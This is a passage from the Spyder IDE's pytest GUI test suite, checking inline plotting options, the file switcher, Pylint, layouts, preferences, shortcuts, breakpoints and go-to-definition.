    # Both images must be essentially identical
    assert compare_images(ipython_figname, plots_figname, 0.1) is None
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
    (parse_version(ipy_release.version) >= parse_version('7.23.0') and
     parse_version(ipykernel.__version__) <= parse_version('5.5.3')),
    reason="Fails due to a bug in the %matplotlib magic")
def test_tight_layout_option_for_inline_plot(main_window, qtbot, tmpdir):
    """
    Test that the option to set bbox_inches to 'tight' or 'None' is
    working when plotting inline in the IPython console. By default, figures
    are plotted inline with bbox_inches='tight'.
    """
    tmpdir = to_text_string(tmpdir)

    # Assert that the default is True.
    assert CONF.get('ipython_console', 'pylab/inline/bbox_inches') is True

    fig_dpi = float(CONF.get('ipython_console', 'pylab/inline/resolution'))
    fig_width = float(CONF.get('ipython_console', 'pylab/inline/width'))
    fig_height = float(CONF.get('ipython_console', 'pylab/inline/height'))

    # Wait until the window is fully up.
    shell = main_window.ipyconsole.get_current_shellwidget()
    client = main_window.ipyconsole.get_current_client()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Give focus to the widget that's going to receive clicks
    control = main_window.ipyconsole.get_widget().get_focus_widget()
    control.setFocus()

    # Generate a plot inline with bbox_inches=tight (since it is default) and
    # save the figure with savefig.
    savefig_figname = osp.join(
        tmpdir, 'savefig_bbox_inches_tight.png').replace('\\', '/')
    with qtbot.waitSignal(shell.executed):
        shell.execute(("import matplotlib.pyplot as plt\n"
                       "fig, ax = plt.subplots()\n"
                       "fig.set_size_inches(%f, %f)\n"
                       "ax.set_position([0.25, 0.25, 0.5, 0.5])\n"
                       "ax.set_xticks(range(10))\n"
                       "ax.xaxis.set_ticklabels([])\n"
                       "ax.set_yticks(range(10))\n"
                       "ax.yaxis.set_ticklabels([])\n"
                       "ax.tick_params(axis='both', length=0)\n"
                       "for loc in ax.spines:\n"
                       "    ax.spines[loc].set_color('#000000')\n"
                       "    ax.spines[loc].set_linewidth(2)\n"
                       "ax.axis([0, 9, 0, 9])\n"
                       "ax.plot(range(10), color='#000000', lw=2)\n"
                       "fig.savefig('%s',\n"
                       "            bbox_inches='tight',\n"
                       "            dpi=%f)"
                       ) % (fig_width, fig_height, savefig_figname, fig_dpi))

    # Get the image name from the html, fetch the image from the shell, and
    # then save it to a file.
    html = shell._control.toHtml()
    img_name = re.search('''<img src="(.+?)" /></p>''', html).group(1)
    qimg = shell._get_image(img_name)
    assert isinstance(qimg, QImage)

    # Save the inline figure and assert it is similar to the one generated
    # with savefig.
    inline_figname = osp.join(tmpdir, 'inline_bbox_inches_tight.png')
    qimg.save(inline_figname)
    assert compare_images(savefig_figname, inline_figname, 0.1) is None

    # Change the option so that bbox_inches=None.
    CONF.set('ipython_console', 'pylab/inline/bbox_inches', False)

    # Restart the kernel and wait until it's up again so the new setting
    # takes effect
    shell._prompt_html = None
    client.restart_kernel()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Generate the same plot inline, this time with bbox_inches=None, and
    # save the figure with savefig.
    savefig_figname = osp.join(
        tmpdir, 'savefig_bbox_inches_None.png').replace('\\', '/')
    with qtbot.waitSignal(shell.executed):
        shell.execute(("import matplotlib.pyplot as plt\n"
                       "fig, ax = plt.subplots()\n"
                       "fig.set_size_inches(%f, %f)\n"
                       "ax.set_position([0.25, 0.25, 0.5, 0.5])\n"
                       "ax.set_xticks(range(10))\n"
                       "ax.xaxis.set_ticklabels([])\n"
                       "ax.set_yticks(range(10))\n"
                       "ax.yaxis.set_ticklabels([])\n"
                       "ax.tick_params(axis='both', length=0)\n"
                       "for loc in ax.spines:\n"
                       "    ax.spines[loc].set_color('#000000')\n"
                       "    ax.spines[loc].set_linewidth(2)\n"
                       "ax.axis([0, 9, 0, 9])\n"
                       "ax.plot(range(10), color='#000000', lw=2)\n"
                       "fig.savefig('%s',\n"
                       "            bbox_inches=None,\n"
                       "            dpi=%f)"
                       ) % (fig_width, fig_height, savefig_figname, fig_dpi))

    # Get the image name from the html, fetch the image from the shell, and
    # then save it to a file.
    html = shell._control.toHtml()
    img_name = re.search('''<img src="(.+?)" /></p>''', html).group(1)
    qimg = shell._get_image(img_name)
    assert isinstance(qimg, QImage)

    # Save the inline figure and assert it is similar to the one generated
    # with savefig.
    inline_figname = osp.join(tmpdir, 'inline_bbox_inches_None.png')
    qimg.save(inline_figname)
    assert compare_images(savefig_figname, inline_figname, 0.1) is None
# FIXME: Make this test work again in our CIs (it's passing locally)
@pytest.mark.skip
@flaky(max_runs=3)
@pytest.mark.slow
@pytest.mark.use_introspection
def test_switcher(main_window, qtbot, tmpdir):
    """Test the use of shorten paths when necessary in the switcher."""
    switcher = main_window.switcher

    # Assert that the full path of a file is shown in the switcher
    file_a = tmpdir.join('test_file_a.py')
    file_a.write('''
def example_def():
    pass

def example_def_2():
    pass
''')
    main_window.editor.load(str(file_a))

    main_window.open_switcher()
    switcher_paths = [switcher.model.item(item_idx).get_description()
                      for item_idx in range(switcher.model.rowCount())]
    assert osp.dirname(str(file_a)) in switcher_paths or len(str(file_a)) > 75
    switcher.close()

    # Assert that long paths are shortened in the switcher
    dir_b = tmpdir
    for _ in range(3):
        dir_b = dir_b.mkdir(str(uuid.uuid4()))
    file_b = dir_b.join('test_file_b.py')
    file_b.write('bar\n')
    main_window.editor.load(str(file_b))

    main_window.open_switcher()
    file_b_text = switcher.model.item(
        switcher.model.rowCount() - 1).get_description()
    assert '...' in file_b_text
    switcher.close()

    # Assert search works correctly
    search_texts = ['test_file_a', 'file_b', 'foo_spam']
    expected_paths = [file_a, file_b, None]
    for search_text, expected_path in zip(search_texts, expected_paths):
        main_window.open_switcher()
        qtbot.keyClicks(switcher.edit, search_text)
        qtbot.wait(200)
        # Exactly one match when a path is expected, zero otherwise
        assert switcher.count() == bool(expected_path)
        switcher.close()

    # Assert symbol switcher works
    main_window.editor.set_current_filename(str(file_a))

    code_editor = main_window.editor.get_focus_widget()
    with qtbot.waitSignal(
            code_editor.completions_response_signal, timeout=30000):
        code_editor.document_did_open()

    with qtbot.waitSignal(
            code_editor.completions_response_signal, timeout=30000):
        code_editor.request_symbols()

    qtbot.wait(9000)

    main_window.open_switcher()
    qtbot.keyClicks(switcher.edit, '@')
    qtbot.wait(200)
    # file_a defines two functions, so the symbol switcher shows two items
    assert switcher.count() == 2
    switcher.close()
@flaky(max_runs=3)
@pytest.mark.slow
def test_edidorstack_open_switcher_dlg(main_window, tmpdir):
    """
    Test that the file switcher is working as expected when called from the
    editorstack.

    Regression test for spyder-ide/spyder#10684
    """
    # Add a file to the editor.
    file = tmpdir.join('test_file_open_switcher_dlg.py')
    file.write("a test file for test_edidorstack_open_switcher_dlg")
    main_window.editor.load(str(file))

    # Test that the file switcher opens as expected from the editorstack.
    editorstack = main_window.editor.get_current_editorstack()
    # The dialog is created lazily, so it must not exist yet.
    assert editorstack.switcher_dlg is None
    editorstack.open_switcher_dlg()
    assert editorstack.switcher_dlg
    assert editorstack.switcher_dlg.isVisible()
    # One switcher entry per open file.
    assert (editorstack.switcher_dlg.count() ==
            len(main_window.editor.get_filenames()))
@flaky(max_runs=3)
@pytest.mark.slow
@pytest.mark.use_introspection
@pytest.mark.skipif(not sys.platform.startswith('linux'),
                    reason="It times out too much on Windows and macOS")
def test_editorstack_open_symbolfinder_dlg(main_window, qtbot, tmpdir):
    """
    Test that the symbol finder is working as expected when called from the
    editorstack.

    Regression test for spyder-ide/spyder#10684
    """
    # Add a file to the editor.
    file = tmpdir.join('test_file.py')
    file.write('''
def example_def():
    pass

def example_def_2():
    pass
''')
    main_window.editor.load(str(file))

    # Wait for the LSP to be ready and to deliver the file's symbols.
    code_editor = main_window.editor.get_focus_widget()
    with qtbot.waitSignal(
            code_editor.completions_response_signal, timeout=30000):
        code_editor.document_did_open()

    with qtbot.waitSignal(
            code_editor.completions_response_signal, timeout=30000):
        code_editor.request_symbols()

    qtbot.wait(5000)

    # Test that the symbol finder opens as expected from the editorstack.
    editorstack = main_window.editor.get_current_editorstack()
    assert editorstack.switcher_dlg is None
    editorstack.open_symbolfinder_dlg()
    assert editorstack.switcher_dlg
    assert editorstack.switcher_dlg.isVisible()
    # The file defines two functions, so the symbol finder lists two entries.
    assert editorstack.switcher_dlg.count() == 2
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin',
                    reason="Times out sometimes on macOS")
def test_run_static_code_analysis(main_window, qtbot):
    """This tests that the Pylint plugin is working as expected."""
    from spyder.plugins.pylint.main_widget import PylintWidgetActions
    # Select the third-party plugin
    pylint_plugin = main_window.get_plugin(Plugins.Pylint)

    # Do an analysis
    test_file = osp.join(LOCATION, 'script_pylint.py')
    main_window.editor.load(test_file)
    pylint_plugin.get_action(PylintWidgetActions.RunCodeAnalysis).trigger()
    qtbot.wait(3000)

    # Perform the test
    # Check output of the analysis
    treewidget = pylint_plugin.get_widget().get_focus_widget()
    qtbot.waitUntil(lambda: treewidget.results is not None,
                    timeout=SHELL_TIMEOUT)
    result_content = treewidget.results
    # 'C:' holds pylint convention messages.
    assert result_content['C:']

    # The expected number of convention messages for script_pylint.py
    # depends on the installed Pylint version.
    pylint_version = parse_version(pylint.__version__)
    if pylint_version < parse_version('2.5.0'):
        number_of_conventions = 5
    else:
        number_of_conventions = 3
    assert len(result_content['C:']) == number_of_conventions

    # Close the file
    main_window.editor.close_file()
@flaky(max_runs=3)
@pytest.mark.slow
def test_troubleshooting_menu_item_and_url(main_window, qtbot, monkeypatch):
    """Test that the troubleshooting menu item calls the valid URL."""
    application_plugin = main_window.application
    MockQDesktopServices = Mock()
    attr_to_patch = ('spyder.utils.qthelpers.QDesktopServices')
    monkeypatch.setattr(attr_to_patch, MockQDesktopServices)

    # Unit test of help menu item: Make sure the correct URL is called.
    application_plugin.trouble_action.trigger()
    # NOTE: the previous version of this test called
    # ``instance.openUrl.called_once_with(...)``, which is not a Mock
    # assertion method — it silently creates a child mock and always
    # "passes".  ``assert_called_once`` is the real assertion API.
    # (The URL argument is wrapped in a QUrl by the caller, so we only
    # assert the call happened exactly once here.)
    assert MockQDesktopServices.openUrl.call_count == 1
    MockQDesktopServices.openUrl.assert_called_once()
@flaky(max_runs=3)
@pytest.mark.slow
@pytest.mark.skipif(os.name == 'nt', reason="It fails on Windows")
def test_help_opens_when_show_tutorial_full(main_window, qtbot):
    """
    Test fix for spyder-ide/spyder#6317.

    'Show tutorial' opens the help plugin if closed.
    """
    HELP_STR = "Help"

    # Find the Help entry in the Panes menu.
    help_pane_menuitem = None
    for action in main_window.layouts.plugins_menu.get_actions():
        if action.text() == HELP_STR:
            help_pane_menuitem = action
            break

    # Test opening tutorial with Help plugin closed
    main_window.help.toggle_view_action.setChecked(False)
    qtbot.wait(500)
    help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window)

    # The Help plugin must be fully closed and unfocused at this point.
    assert help_tabbar is None and help_index is None
    assert not isinstance(main_window.focusWidget(), ObjectComboBox)
    assert not help_pane_menuitem.isChecked()

    main_window.help.show_tutorial()
    qtbot.wait(500)

    help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window)
    assert None not in (help_tabbar, help_index)
    assert help_index == help_tabbar.currentIndex()
    assert help_pane_menuitem.isChecked()

    # Test opening tutorial with help plugin open, but not selected
    help_tabbar.setCurrentIndex((help_tabbar.currentIndex() + 1)
                                % help_tabbar.count())
    qtbot.wait(500)
    help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window)
    assert None not in (help_tabbar, help_index)
    assert help_index != help_tabbar.currentIndex()
    assert help_pane_menuitem.isChecked()

    main_window.help.show_tutorial()
    qtbot.wait(500)
    help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window)
    assert None not in (help_tabbar, help_index)
    assert help_index == help_tabbar.currentIndex()
    assert help_pane_menuitem.isChecked()

    # Test opening tutorial with help plugin open and the active tab
    qtbot.wait(500)
    main_window.help.show_tutorial()
    help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window)
    qtbot.wait(500)
    assert None not in (help_tabbar, help_index)
    assert help_index == help_tabbar.currentIndex()
    assert help_pane_menuitem.isChecked()
@pytest.mark.slow
@flaky(max_runs=3)
def test_report_issue(main_window, qtbot):
    """Check that the issue reporting dialog opens and can be closed."""
    console = main_window.console
    console.report_issue()
    qtbot.wait(300)

    # The dialog should now exist, be on screen, and accept a close request.
    report_dialog = console.get_widget()._report_dlg
    assert report_dialog is not None
    assert report_dialog.isVisible()
    assert report_dialog.close()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
    sys.platform.startswith('linux'), reason="It segfaults on Linux")
def test_custom_layouts(main_window, qtbot):
    """Test that the default layouts show the expected widgets as visible."""
    mw = main_window
    mw.first_spyder_run = False
    prefix = 'window' + '/'
    settings = mw.layouts.load_window_settings(prefix=prefix, default=True)

    # Test layout changes
    for layout_idx in get_class_values(DefaultLayouts):
        with qtbot.waitSignal(mw.sig_layout_setup_ready, timeout=5000):
            layout = mw.layouts.setup_default_layouts(
                layout_idx, settings=settings)

        qtbot.wait(500)
        # Every plugin placed in a visible area and not explicitly hidden
        # must report a visible widget.
        for area in layout._areas:
            if area['visible']:
                for plugin_id in area['plugin_ids']:
                    if plugin_id not in area['hidden_plugin_ids']:
                        plugin = mw.get_plugin(plugin_id)
                        print(plugin)  # spyder: test-skip
                        try:
                            # New API
                            assert plugin.get_widget().isVisible()
                        except AttributeError:
                            # Old API
                            assert plugin.isVisible()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(not running_in_ci() or sys.platform.startswith('linux'),
                    reason="Only runs in CIs and fails on Linux sometimes")
def test_programmatic_custom_layouts(main_window, qtbot):
    """
    Test that a custom layout gets registered and it is recognized.
    """
    mw = main_window
    mw.first_spyder_run = False

    # Test layout registration
    layout_id = 'testing layout'

    # Test the testing plugin is being loaded
    mw.get_plugin('spyder_boilerplate')

    # Get the registered layout
    layout = mw.layouts.get_layout(layout_id)

    with qtbot.waitSignal(mw.sig_layout_setup_ready, timeout=5000):
        mw.layouts.quick_layout_switch(layout_id)

    qtbot.wait(500)
    # Every plugin placed in a visible area and not explicitly hidden
    # must report a visible widget.
    for area in layout._areas:
        if area['visible']:
            for plugin_id in area['plugin_ids']:
                if plugin_id not in area['hidden_plugin_ids']:
                    plugin = mw.get_plugin(plugin_id)
                    print(plugin)  # spyder: test-skip
                    try:
                        # New API
                        assert plugin.get_widget().isVisible()
                    except AttributeError:
                        # Old API
                        assert plugin.isVisible()
@pytest.mark.slow
@flaky(max_runs=3)
def test_save_on_runfile(main_window, qtbot):
    """Test that the current file is saved before being executed by runfile."""
    # Load test file
    test_file = osp.join(LOCATION, 'script.py')
    test_file_copy = test_file[:-3] + '_copy.py'
    shutil.copyfile(test_file, test_file_copy)
    main_window.editor.load(test_file_copy)
    code_editor = main_window.editor.get_focus_widget()

    # Verify result
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Type an (unsaved) assignment into the editor, then run the file; the
    # value is only visible in the kernel if the file was auto-saved first.
    qtbot.keyClicks(code_editor, 'test_var = 123', delay=100)
    filename = code_editor.filename
    with qtbot.waitSignal(shell.executed):
        shell.execute('runfile("{}")'.format(remove_backslashes(filename)))

    assert shell.get_value('test_var') == 123
    main_window.editor.close_file()
    os.remove(test_file_copy)
@pytest.mark.slow
@pytest.mark.skipif(sys.platform == 'darwin', reason="Fails on macOS")
def test_pylint_follows_file(qtbot, tmpdir, main_window):
    """Test that file editor focus change updates pylint combobox filename."""
    pylint_plugin = main_window.get_plugin(Plugins.Pylint)

    # Show pylint plugin
    pylint_plugin.dockwidget.show()
    pylint_plugin.dockwidget.raise_()

    # Create base temporary directory
    basedir = tmpdir.mkdir('foo')

    # Open some files
    for idx in range(2):
        fh = basedir.join('{}.py'.format(idx))
        fname = str(fh)
        fh.write('print("Hello world!")')
        main_window.open_file(fh)
        qtbot.wait(200)
        # Pylint's combobox must track the file that just received focus.
        assert fname == pylint_plugin.get_filename()

    # Create a editor split
    main_window.editor.editorsplitter.split(orientation=Qt.Vertical)
    qtbot.wait(500)

    # Open other files (0 and 1 are reopened; 2 and 3 are new) and check
    # the combobox still follows focus after the split.
    for idx in range(4):
        fh = basedir.join('{}.py'.format(idx))
        fh.write('print("Hello world!")')
        fname = str(fh)
        main_window.open_file(fh)
        qtbot.wait(200)
        assert fname == pylint_plugin.get_filename()

    # Close split panel (only the last editorstack needs closing).
    for editorstack in reversed(main_window.editor.editorstacks):
        editorstack.close_split()
        break
    qtbot.wait(1000)
@pytest.mark.slow
@flaky(max_runs=3)
def test_report_comms_error(qtbot, main_window):
    """Test if a comms error is correctly displayed."""
    CONF.set('main', 'show_internal_errors', True)
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Create a bogus get_cwd handler that raises ImportError when invoked.
    with qtbot.waitSignal(shell.executed):
        shell.execute('def get_cwd(): import foo')
    with qtbot.waitSignal(shell.executed):
        shell.execute("get_ipython().kernel.frontend_comm."
                      "register_call_handler('get_cwd', get_cwd)")
    # 'ls' triggers the bogus handler through the comms machinery.
    with qtbot.waitSignal(shell.executed, timeout=3000):
        shell.execute('ls')

    # The internal-error dialog must show the comms traceback.
    qtbot.waitUntil(lambda: main_window.console.error_dialog is not None,
                    timeout=EVAL_TIMEOUT)
    error_dialog = main_window.console.error_dialog
    assert 'Exception in comms call get_cwd' in error_dialog.error_traceback
    assert 'No module named' in error_dialog.error_traceback
    main_window.console.close_error_dialog()
    CONF.set('main', 'show_internal_errors', False)
@pytest.mark.slow
@flaky(max_runs=3)
def test_break_while_running(main_window, qtbot, tmpdir):
    """Test that we can set breakpoints while running."""
    # Create loop
    code = ("import time\n"
            "for i in range(100):\n"
            "    print(i)\n"
            "    time.sleep(0.1)\n"
            )
    p = tmpdir.join("loop_script.py")
    p.write(code)
    test_file = to_text_string(p)

    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Main variables
    debug_action = main_window.debug_toolbar_actions[0]
    debug_button = main_window.debug_toolbar.widgetForAction(debug_action)

    # Load test file
    main_window.editor.load(test_file)
    code_editor = main_window.editor.get_focus_widget()

    # Clear all breakpoints
    main_window.editor.clear_all_breakpoints()

    # Click the debug button
    with qtbot.waitSignal(shell.executed):
        qtbot.mouseClick(debug_button, Qt.LeftButton)
    qtbot.wait(1000)

    # Continue debugging so the loop keeps printing
    qtbot.keyClicks(shell._control, '!c')
    qtbot.keyClick(shell._control, Qt.Key_Enter)
    qtbot.wait(500)

    with qtbot.waitSignal(shell.executed):
        # Set a breakpoint while the loop runs.
        # (NB: ``toogle_breakpoint`` is the editor API's actual, misspelled
        # method name — do not "fix" it here.)
        code_editor.debugger.toogle_breakpoint(line_number=3)

    # We should drop into the debugger
    with qtbot.waitSignal(shell.executed):
        qtbot.keyClicks(shell._control, '!q')
        qtbot.keyClick(shell._control, Qt.Key_Enter)

    # Clear all breakpoints
    main_window.editor.clear_all_breakpoints()
# --- Preferences
# ----------------------------------------------------------------------------
def preferences_dialog_helper(qtbot, main_window, section):
    """
    Open the preferences dialog and switch to the page whose CONF_SECTION
    matches ``section``.

    Returns a ``(dialog, page_index, page_widget)`` tuple.
    """
    main_window.show_preferences()
    container = main_window.preferences.get_container()

    # The dialog is created asynchronously; block until it exists.
    qtbot.waitUntil(lambda: container.dialog is not None, timeout=5000)

    dialog = container.dialog
    page_index = dialog.get_index_by_name(section)
    page_widget = dialog.get_page(page_index)
    dialog.set_current_index(page_index)
    return dialog, page_index, page_widget
@pytest.mark.slow
def test_preferences_run_section_exists(main_window, qtbot):
    """
    Regression test for spyder-ide/spyder#13524.

    Opening the preferences on the 'run' section must succeed, i.e. the
    Run page still exists.
    """
    result = preferences_dialog_helper(qtbot, main_window, 'run')
    assert result
@pytest.mark.slow
def test_preferences_checkboxes_not_checked_regression(main_window, qtbot):
    """
    Test for spyder-ide/spyder/#10139 regression.

    Enabling codestyle/docstyle on the completion section of preferences,
    was not updating correctly.
    """
    # Reset config
    CONF.set('completions',
             ('provider_configuration', 'lsp', 'values', 'pydocstyle'),
             False)
    CONF.set('completions',
             ('provider_configuration', 'lsp', 'values', 'pycodestyle'),
             False)

    # Open completion preferences and update options
    dlg, index, page = preferences_dialog_helper(qtbot, main_window,
                                                 'completions')
    # Get the correct tab pages inside the Completion preferences page
    tnames = [page.tabs.tabText(i).lower() for i in range(page.tabs.count())]

    tabs = [(page.tabs.widget(i).layout().itemAt(0).widget(), i)
            for i in range(page.tabs.count())]

    tabs = dict(zip(tnames, tabs))
    # Maps tab title -> name of the checkbox attribute on that tab.
    tab_widgets = {
        'code style and formatting': 'code_style_check',
        'docstring style': 'docstring_style_check'
    }
    # Click each checkbox with its tab visible, then accept the dialog.
    for tabname in tab_widgets:
        tab, idx = tabs[tabname]
        check_name = tab_widgets[tabname]
        check = getattr(tab, check_name)
        page.tabs.setCurrentIndex(idx)
        check.animateClick()
        qtbot.wait(500)
    dlg.ok_btn.animateClick()

    preferences = main_window.preferences
    container = preferences.get_container()

    qtbot.waitUntil(lambda: container.dialog is None,
                    timeout=5000)

    # Check the menus are correctly updated
    count = 0
    for menu_item in main_window.source_menu_actions:
        if menu_item and isinstance(menu_item, QAction):
            print(menu_item.text(), menu_item.isChecked())

            if 'code style' in menu_item.text():
                assert menu_item.isChecked()
                count += 1
            elif 'docstring style' in menu_item.text():
                assert menu_item.isChecked()
                count += 1
    # Both menu entries must exist and be checked.
    assert count == 2

    # Reset config
    CONF.set('completions',
             ('provider_configuration', 'lsp', 'values', 'pydocstyle'),
             False)
    CONF.set('completions',
             ('provider_configuration', 'lsp', 'values', 'pycodestyle'),
             False)
@pytest.mark.slow
def test_preferences_change_font_regression(main_window, qtbot):
    """
    Test for spyder-ide/spyder/#10284 regression.

    Changing font resulted in error.
    """
    dlg, index, page = preferences_dialog_helper(qtbot, main_window,
                                                 'appearance')
    # Bump both font selectors to the next font, then accept; the dialog
    # must close without raising.
    for fontbox in [page.plain_text_font.fontbox,
                    page.rich_text_font.fontbox]:
        fontbox.setFocus()
        idx = fontbox.currentIndex()
        fontbox.setCurrentIndex(idx + 1)
    dlg.ok_btn.animateClick()

    preferences = main_window.preferences
    container = preferences.get_container()
    qtbot.waitUntil(lambda: container.dialog is None,
                    timeout=5000)
@pytest.mark.slow
@pytest.mark.skipif(
    not sys.platform.startswith('linux'),
    reason="Changes of Shift+Return shortcut cause an ambiguous shortcut")
def test_preferences_empty_shortcut_regression(main_window, qtbot):
    """
    Test for spyder-ide/spyder/#12992 regression.

    Overwriting shortcuts results in a shortcuts conflict.
    """
    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Setup shortcuts (set run cell and advance shortcut to run selection)
    base_run_cell_advance = CONF.get_shortcut(
        'editor', 'run cell and advance')  # Should be Shift+Return
    base_run_selection = CONF.get_shortcut(
        'editor', 'run selection')  # Should be F9
    assert base_run_cell_advance == 'Shift+Return'
    assert base_run_selection == 'F9'

    # Swap: clear "run cell and advance" and give its key to "run selection".
    CONF.set_shortcut(
        'editor', 'run cell and advance', '')
    CONF.set_shortcut(
        'editor', 'run selection', base_run_cell_advance)
    main_window.shortcuts.apply_shortcuts()

    # Check execution of shortcut
    # Create new file
    main_window.editor.new()
    code_editor = main_window.editor.get_focus_widget()
    code_editor.set_text(u'print(0)\nprint(ññ)')

    # Shift+Return now runs the selection (first line only).
    with qtbot.waitSignal(shell.executed):
        qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
    qtbot.waitUntil(lambda: u'print(0)' in shell._control.toPlainText())
    assert u'ññ' not in shell._control.toPlainText()

    # Reset shortcuts
    CONF.set_shortcut(
        'editor', 'run selection', 'F9')
    CONF.set_shortcut(
        'editor', 'run cell and advance', 'Shift+Return')
    main_window.shortcuts.apply_shortcuts()

    qtbot.wait(500)  # Wait for shortcut change to actually be applied

    # Check shortcut run cell and advance reset
    code_editor.setFocus()
    with qtbot.waitSignal(shell.executed):
        qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
    qtbot.waitUntil(lambda: 'runcell(0' in shell._control.toPlainText())
@pytest.mark.slow
def test_preferences_shortcut_reset_regression(main_window, qtbot):
    """
    Test for spyder-ide/spyder/#11132 regression.

    Resetting shortcut resulted in error.
    """
    dlg, index, page = preferences_dialog_helper(qtbot, main_window,
                                                 'shortcuts')
    # Reset all shortcuts to defaults and accept; the dialog must close
    # without raising.
    page.reset_to_default(force=True)
    dlg.ok_btn.animateClick()

    preferences = main_window.preferences
    container = preferences.get_container()
    qtbot.waitUntil(lambda: container.dialog is None,
                    timeout=5000)
@pytest.mark.slow
@pytest.mark.order(1)
def test_preferences_change_interpreter(qtbot, main_window):
    """Test that on main interpreter change signal is emitted."""
    # Check original pyls configuration
    lsp = main_window.completions.get_provider('lsp')
    config = lsp.generate_python_config()
    jedi = config['configurations']['pylsp']['plugins']['jedi']
    assert jedi['environment'] is None
    assert jedi['extra_paths'] == []

    # Change main interpreter on preferences to a custom executable
    dlg, index, page = preferences_dialog_helper(qtbot, main_window,
                                                 'main_interpreter')
    page.cus_exec_radio.setChecked(True)
    page.cus_exec_combo.combobox.setCurrentText(sys.executable)

    # Accepting the dialog must emit sig_main_interpreter_changed.
    with qtbot.waitSignal(main_window.sig_main_interpreter_changed,
                          timeout=5000, raising=True):
        dlg.ok_btn.animateClick()

    # Check updated pyls configuration
    config = lsp.generate_python_config()
    jedi = config['configurations']['pylsp']['plugins']['jedi']
    assert jedi['environment'] == sys.executable
    assert jedi['extra_paths'] == []
@pytest.mark.slow
def test_preferences_last_page_is_loaded(qtbot, main_window):
    """
    Test that the page last shown in the preferences dialog is selected
    again when the dialog is reopened.
    """
    # Test that the last page is updated on re open
    dlg, index, page = preferences_dialog_helper(qtbot, main_window,
                                                 'main_interpreter')
    preferences = main_window.preferences
    container = preferences.get_container()
    qtbot.waitUntil(lambda: container.dialog is not None,
                    timeout=5000)
    dlg.ok_btn.animateClick()
    qtbot.waitUntil(lambda: container.dialog is None,
                    timeout=5000)

    # Reopen and check the previously selected page index is restored.
    main_window.show_preferences()
    qtbot.waitUntil(lambda: container.dialog is not None,
                    timeout=5000)
    dlg = container.dialog
    assert dlg.get_current_index() == index
    dlg.ok_btn.animateClick()
    qtbot.waitUntil(lambda: container.dialog is None,
                    timeout=5000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.use_introspection
@pytest.mark.skipif(not sys.platform.startswith('linux'),
                    reason="It times out too much on Windows and macOS")
def test_go_to_definition(main_window, qtbot, capsys):
    """Test that go-to-definition works as expected."""
    # --- Code that gives no definition
    code_no_def = dedent("""
    from qtpy.QtCore import Qt
    Qt.FramelessWindowHint""")

    # Create new editor with code and wait until LSP is ready
    main_window.editor.new(text=code_no_def)
    code_editor = main_window.editor.get_focus_widget()
    with qtbot.waitSignal(
            code_editor.completions_response_signal, timeout=30000):
        code_editor.document_did_open()

    # Move cursor to the left one character to be next to
    # FramelessWindowHint
    code_editor.move_cursor(-1)
    with qtbot.waitSignal(
            code_editor.completions_response_signal):
        code_editor.go_to_definition_from_cursor()

    # Capture stderr and assert there are no errors
    sys_stream = capsys.readouterr()
    assert sys_stream.err == u''

    # --- Code that gives definition
    code_def = "import qtpy.QtCore"

    # Create new editor with code and wait until LSP is ready
    main_window.editor.new(text=code_def)
    code_editor = main_window.editor.get_focus_widget()
    with qtbot.waitSignal(
            code_editor.completions_response_signal, timeout=30000):
        code_editor.document_did_open()

    # Move cursor to the left one character to be next to QtCore
    code_editor.move_cursor(-1)
    with qtbot.waitSignal(
            code_editor.completions_response_signal):
        code_editor.go_to_definition_from_cursor()

    def _get_filenames():
        # Base names of all files currently open in the editor.
        return [osp.basename(f) for f in main_window.editor.get_filenames()]

    # Going to the definition of QtCore should open QtCore.py in the editor.
    qtbot.waitUntil(lambda: 'QtCore.py' in _get_filenames())
    assert 'QtCore.py' in _get_filenames()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin' and not PY2,
                    reason="It times out on macOS/PY3")
def test_debug_unsaved_file(main_window, qtbot):
    """Test that we can debug an unsaved file."""
    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Main variables
    control = shell._control
    debug_action = main_window.debug_toolbar_actions[0]
    debug_button = main_window.debug_toolbar.widgetForAction(debug_action)

    # Clear all breakpoints
    main_window.editor.clear_all_breakpoints()

    # create new file (never saved to disk)
    main_window.editor.new()
    code_editor = main_window.editor.get_focus_widget()
    code_editor.set_text('print(0)\nprint(1)\nprint(2)')

    # Set breakpoint on line 2
    # (``toogle_breakpoint`` is the editor API's actual, misspelled name.)
    code_editor.debugger.toogle_breakpoint(line_number=2)
    qtbot.wait(500)

    # Start debugging
    qtbot.mouseClick(debug_button, Qt.LeftButton)

    # There is a breakpoint, so it should continue and stop at line 2.
    qtbot.waitUntil(
        lambda: '!continue' in shell._control.toPlainText())
    qtbot.waitUntil(
        lambda: "1---> 2 print(1)" in control.toPlainText())
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize(
    "debug", [True, False])
def test_runcell(main_window, qtbot, tmpdir, debug):
